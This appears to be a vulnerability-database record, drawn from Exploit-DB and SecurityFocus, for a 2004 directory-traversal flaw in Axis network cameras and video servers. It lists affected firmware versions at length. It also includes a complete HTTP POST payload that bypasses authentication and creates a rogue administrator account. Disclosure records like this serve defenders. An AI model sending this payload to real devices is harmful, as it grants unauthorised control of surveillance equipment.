ID
VAR-E-200408-0045
EDB ID
24401
TITLE
Axis Network Camera 2.x And Video Server 1-3 - Directory Traversal - CGI webapps Exploit
Trust: 0.6
DESCRIPTION
Axis Network Camera 2.x And Video Server 1-3 - Directory Traversal.. webapps exploit for CGI platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | axis | model: | network camera and video server | scope: | eq | version: | 2.x1-3 | Trust: 1.6 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24113.12 | Trust: 0.6 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 2401+3.12 | Trust: 0.6 |
| vendor: | axis | model: | communications storpoint cd | scope: | - | version: | - | Trust: 0.3 |
| vendor: | axis | model: | communications serial server | scope: | eq | version: | 2490 | Trust: 0.3 |
| vendor: | axis | model: | communications network dvr | scope: | eq | version: | 2460 | Trust: 0.3 |
| vendor: | axis | model: | communications mpeg-2 video server 250s | scope: | - | version: | - | Trust: 0.3 |
| vendor: | axis | model: | communications 250s video server | scope: | eq | version: | 3.03 | Trust: 0.3 |
| vendor: | axis | model: | communications 250s mpeg-2 video server | scope: | eq | version: | 3.10 | Trust: 0.3 |
| vendor: | axis | model: | communications serial server | scope: | eq | version: | 24902.11.3 | Trust: 0.3 |
| vendor: | axis | model: | communications network dvr | scope: | eq | version: | 24603.11 | Trust: 0.3 |
| vendor: | axis | model: | communications network dvr | scope: | eq | version: | 24603.10 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24202.34 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24202.32 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 24202.41 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 24202.40 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 24202.34 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 24202.33 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 24202.32 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 24202.31 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 24202.30 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 24202.12 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24113.13 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 2401+3.13 | Trust: 0.3 |
| vendor: | axis | model: | communications blade video server | scope: | eq | version: | 2401+3.12 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24012.34 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24012.33 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24012.32 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24012.31 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24012.30 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24012.20 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24011.15 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24011.01 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 2400+3.12 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 2400+3.11 | Trust: 0.3 |
| vendor: | axis | model: | communications blade video server | scope: | eq | version: | 2400+3.12 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24002.34 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24002.33 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24002.32 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24002.31 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24002.30 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24002.20 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24002.0 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24001.15 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24001.12 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24001.11 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24001.10 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24001.02 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24001.01 | Trust: 0.3 |
| vendor: | axis | model: | communications mpeg-2 video server | scope: | eq | version: | 2303.11 | Trust: 0.3 |
| vendor: | axis | model: | communications ptz network camera | scope: | eq | version: | 21302.40 | Trust: 0.3 |
| vendor: | axis | model: | communications ptz network camera | scope: | eq | version: | 21302.34 | Trust: 0.3 |
| vendor: | axis | model: | communications ptz network camera | scope: | eq | version: | 21302.32 | Trust: 0.3 |
| vendor: | axis | model: | communications ptz network camera | scope: | eq | version: | 21302.31 | Trust: 0.3 |
| vendor: | axis | model: | communications ptz network camera | scope: | eq | version: | 21302.30 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21202.41 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21202.40 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21202.34 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21202.32 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21202.31 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21202.30 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21202.12 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21102.41 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21102.40 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21102.34 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21102.32 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21102.31 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21102.30 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21102.12 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21002.41 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21002.40 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21002.34 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21002.33 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21002.32 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21002.31 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21002.30 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21002.12 | Trust: 0.3 |
| vendor: | axis | model: | communications 250s mpeg-2 video server | scope: | ne | version: | 3.20 | Trust: 0.3 |
| vendor: | axis | model: | communications digital video recorder | scope: | ne | version: | 24603.13 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | ne | version: | 24202.42 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | ne | version: | 24113.13 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | ne | version: | 2401+3.13 | Trust: 0.3 |
| vendor: | axis | model: | communications blade video server | scope: | ne | version: | 2401+3.13 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | ne | version: | 24012.34.1 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | ne | version: | 2400+3.13 | Trust: 0.3 |
| vendor: | axis | model: | communications blade video server | scope: | ne | version: | 2400+3.13 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | ne | version: | 24002.34.1 | Trust: 0.3 |
| vendor: | axis | model: | communications mpeg-2 video server | scope: | ne | version: | 2303.20 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | ne | version: | 21302.42 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | ne | version: | 21202.42 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | ne | version: | 21102.42 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | ne | version: | 21002.42 | Trust: 0.3 |
EXPLOIT
source: https://www.securityfocus.com/bid/11011/info
A directory-traversal vulnerability in HTTP POST requests. This attack is demonstrated by an anonymous user calling protected administration scripts. This bypasses authentication checks and gives anonymous users remote adminitration of the devices.
This issue is reported to affect:
- Axis 2100, 2110, 2120, 2420 network cameras with firmware versions 2.12 thru 2.40
- Axis 2130 network cameras
- Axis 2401,and 2401 video servers
POST /cgi-bin/scripts/../../this_server/ServerManager.srv HTTP/1.0
Content-Length: 250
Pragma: no-cache
conf_Security_List=root%%3AADVO%%3A%%3Awh00t%%3AAD%%3A119104048048116%%3A&users=wh00t&username=wh00t&password1=wh00t&password2=wh00t&checkAdmin=on&checkDial=on&checkView=on&servermanager_return_page=%%2Fadmin%%2Fsec_users.shtml&servermanager_do=set_variables
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Directory Traversal
Trust: 1.0
CREDITS
bashis
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 24401 | Trust: 1.9 |
| db: | BID | id: | 11011 | Trust: 1.9 |
| db: | EDBNET | id: | 46535 | Trust: 0.6 |
REFERENCES
| url: | https://www.securityfocus.com/bid/11011/info | Trust: 1.0 |
| url: | https://www.exploit-db.com/exploits/24401/ | Trust: 0.6 |
| url: | https://www.exploit-db.com/exploits/24402 | Trust: 0.3 |
| url: | http://www.axis.com/products/camera_servers/index.htm | Trust: 0.3 |
| url: | https://www.exploit-db.com/exploits/24401 | Trust: 0.3 |
| url: | https://www.exploit-db.com/exploits/24400 | Trust: 0.3 |
SOURCES
| db: | BID | id: | 11011 |
| db: | EXPLOIT-DB | id: | 24401 |
| db: | EDBNET | id: | 46535 |
LAST UPDATE DATE
2022-07-27T09:44:13.536000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 11011 | date: | 2007-02-06T20:08:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 11011 | date: | 2004-08-23T00:00:00 |
| db: | EXPLOIT-DB | id: | 24401 | date: | 2004-08-23T00:00:00 |
| db: | EDBNET | id: | 46535 | date: | 2004-08-23T00:00:00 |